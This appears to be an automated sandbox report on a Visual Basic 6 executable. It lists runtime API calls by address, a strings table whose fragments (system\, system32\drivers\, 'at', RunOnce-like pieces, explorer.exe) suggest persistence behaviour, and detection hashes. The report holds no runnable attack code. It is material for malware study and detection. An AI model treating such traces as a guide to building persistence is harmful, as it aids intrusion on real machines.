Part of subcall function 00429E10: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
Part of subcall function 00429E10: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
Part of subcall function 00429E10: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
Part of subcall function 00429E10: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
Part of subcall function 00429E10: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
Part of subcall function 00429E10: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
Part of subcall function 00429E10: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B

#580.MSVBVM60(00000000,00000027), ref: 0040CA1A
__vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
__vbaStrMove.MSVBVM60 ref: 0040CA3D
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
__vbaStrMove.MSVBVM60 ref: 0040CA62
__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
__vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
__vbaStrMove.MSVBVM60 ref: 0040CAA4
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
__vbaStrMove.MSVBVM60 ref: 0040CAC8
__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BED1

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040C157
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040C1B9
__vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040C1D2
#600.MSVBVM60(00000008,00000000), ref: 0040C1E8
__vbaFreeVar.MSVBVM60 ref: 0040C1F7
__vbaNew.MSVBVM60(004075DC), ref: 0040C209
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C214
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040C250
__vbaFreeObj.MSVBVM60 ref: 0040C26B
__vbaStrCopy.MSVBVM60 ref: 0040C296
__vbaStrMove.MSVBVM60(?), ref: 0040C2AA
__vbaStrCopy.MSVBVM60 ref: 0040C2B7
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C2C7
__vbaStrCopy.MSVBVM60 ref: 0040C2DF

Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422A8B
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?,00000000), ref: 00422AA0
Part of subcall function 004228E0: __vbaStrCmp.MSVBVM60(00000000), ref: 00422AA7
Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422ACE
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422AF4
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000004), ref: 00422B15
Part of subcall function 004228E0: #618.MSVBVM60(00000000), ref: 00422B1C
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 00422B27
Part of subcall function 004228E0: __vbaI4Str.MSVBVM60(00000000), ref: 00422B2E
Part of subcall function 004228E0: __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422B45
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422B78
Part of subcall function 004228E0: __vbaFileClose.MSVBVM60(00000000), ref: 00422B7F
Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60(00422BC8), ref: 00422BB8
Part of subcall function 004228E0: __vbaFreeStr.MSVBVM60 ref: 00422BC1

__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B52E

Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9

__vbaStrMove.MSVBVM60 ref: 0040B4C8

Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7

__vbaStrCmp.MSVBVM60(00406F28,?), ref: 0040B56A
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0D4,00000000), ref: 0040B5CC
__vbaStrCat.MSVBVM60( RU,00000000,00000000), ref: 0040B5E5
__vbaStrMove.MSVBVM60 ref: 0040B5F0
__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B611
__vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B62A
__vbaStrMove.MSVBVM60 ref: 0040B635
__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B656
#600.MSVBVM60(00004008,00000000,0042C0D4), ref: 0040B691
__vbaEnd.MSVBVM60 ref: 0040B6A4
__vbaStrCopy.MSVBVM60 ref: 0040BA01
__vbaStrMove.MSVBVM60(?), ref: 0040BA15
__vbaStrCopy.MSVBVM60 ref: 0040BA22
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA32
__vbaStrCopy.MSVBVM60 ref: 0040BA4A
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B413

Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80

#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
__vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
__vbaStrMove.MSVBVM60 ref: 0040CB85
__vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
__vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
__vbaStrMove.MSVBVM60 ref: 0040B2E7

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

__vbaStrCopy.MSVBVM60 ref: 0040B1D7

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0E4

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 0040CBF9
__vbaStrCopy.MSVBVM60 ref: 0040CC06
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
__vbaStrCopy.MSVBVM60 ref: 0040CC2E
__vbaStrMove.MSVBVM60(?), ref: 0040CC42
__vbaStrCopy.MSVBVM60 ref: 0040CC4F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
__vbaStrCopy.MSVBVM60 ref: 0040CC77
__vbaStrMove.MSVBVM60(?), ref: 0040CC8B
__vbaStrCopy.MSVBVM60 ref: 0040CC98
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
__vbaStrCopy.MSVBVM60 ref: 0040CCC0
__vbaStrMove.MSVBVM60(?), ref: 0040CCD4
__vbaStrCopy.MSVBVM60 ref: 0040CCE1
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
__vbaStrCopy.MSVBVM60 ref: 0040CD09
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
__vbaStrMove.MSVBVM60 ref: 0040CD26
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
__vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
__vbaStrMove.MSVBVM60 ref: 0040CD4D
__vbaStrCopy.MSVBVM60 ref: 0040CD5A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
__vbaStrCopy.MSVBVM60 ref: 0040CD8A
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
__vbaStrMove.MSVBVM60 ref: 0040CDA7
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
__vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
__vbaStrMove.MSVBVM60 ref: 0040CDCE
__vbaStrCopy.MSVBVM60 ref: 0040CDDB
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
__vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
__vbaStrMove.MSVBVM60 ref: 0040CE1A
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
__vbaStrMove.MSVBVM60 ref: 0040CE33
__vbaStrCopy.MSVBVM60 ref: 0040CE40
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
__vbaStrCopy.MSVBVM60 ref: 0040CE68
__vbaStrMove.MSVBVM60(?), ref: 0040CE7C
__vbaStrCopy.MSVBVM60 ref: 0040CE89
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99

Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8

__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
__vbaFreeObj.MSVBVM60 ref: 0040CF42
__vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
__vbaFreeStr.MSVBVM60 ref: 0040CFAA

Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,72A20EBE), ref: 00411B74
Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F

__vbaErrorOverflow.MSVBVM60 ref: 0040CFD8
__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
__vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
__vbaI2I4.MSVBVM60 ref: 0040D0ED
__vbaFreeObj.MSVBVM60 ref: 0040D0FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164

Strings

system\, xrefs: 0040B12C, 0040B21E, 0040B2D7, 0040B358, 0040BB8E, 0040BE75, 0040C003, 0040C0AD, 0040CD16, 0040CD97
SE, xrefs: 0040BD75
yLZ, xrefs: 0040C34F
PR, xrefs: 0040C1CD
:%7, xrefs: 0040BE17
MR, xrefs: 0040CB75
system32\drivers\, xrefs: 0040BEF6
at , xrefs: 0040C534
Once, xrefs: 0040CA52, 0040CAB8
~, xrefs: 0040C4DC
at., xrefs: 0040CE0A
RU, xrefs: 0040B4B8, 0040B4FD, 0040B5E0, 0040B625
RO, xrefs: 0040CA2D, 0040CA94

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$Copy$List$Error$CheckHresult$BstrSystem$Chkstk$AnsiNew2Unicode$#580$#525#600File$#517#537#616Unlock$#631$#516#570#648Open$#618#690Get3LockNameSeek$#529#535#598#611#661#669#705#709BoundsCloseComputerDestructEraseGenerateGet4OverflowRedimUser
String ID: MR$ PR$ RO$ RU$ SE$:%7$Once$at $at.$system32\drivers\$system\$yLZ$~
API String ID: 1890118787-2767012170
Opcode ID: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
Instruction ID: c9e735e97b199634a30fa5df19e6cf838b9fc4480779932f55755727901e6869
Opcode Fuzzy Hash: c75b1a3e694dbd6f5d10d2331ab2ca9d09b35fafcf85166375154907e56220f4
Instruction Fuzzy Hash: D2531A75A00208EFDB14DFA0EE89BDEBBB5EF48304F108169E506B72A0DB745A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004218D0, Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
#648.MSVBVM60(0000000A), ref: 00421961
__vbaFreeVar.MSVBVM60 ref: 00421970
__vbaI2I4.MSVBVM60(?), ref: 00421984
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
__vbaI2I4.MSVBVM60 ref: 004219A2
#570.MSVBVM60(00000000), ref: 004219A9
__vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
__vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
#525.MSVBVM60(00000000), ref: 004219F4
__vbaStrMove.MSVBVM60 ref: 004219FF
__vbaI2I4.MSVBVM60 ref: 00421A0F
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
__vbaI2I4.MSVBVM60 ref: 00421A2A
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
__vbaStrCopy.MSVBVM60 ref: 00421A4C

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00421A60

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?,00000000), ref: 00421A75
__vbaStrCmp.MSVBVM60(00000000), ref: 00421A7C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00421A9E
__vbaI2I4.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00421ACB
__vbaFileClose.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 00421AD2
__vbaI2I4.MSVBVM60 ref: 00421AE9
__vbaFileClose.MSVBVM60(00000000), ref: 00421AF0
__vbaI2I4.MSVBVM60 ref: 00421B1B
__vbaFileSeek.MSVBVM60(?,00000000), ref: 00421B26
__vbaI2I4.MSVBVM60 ref: 00421B36
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00421B43
__vbaI2I4.MSVBVM60 ref: 00421B72
__vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00421B7B

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00421BAA
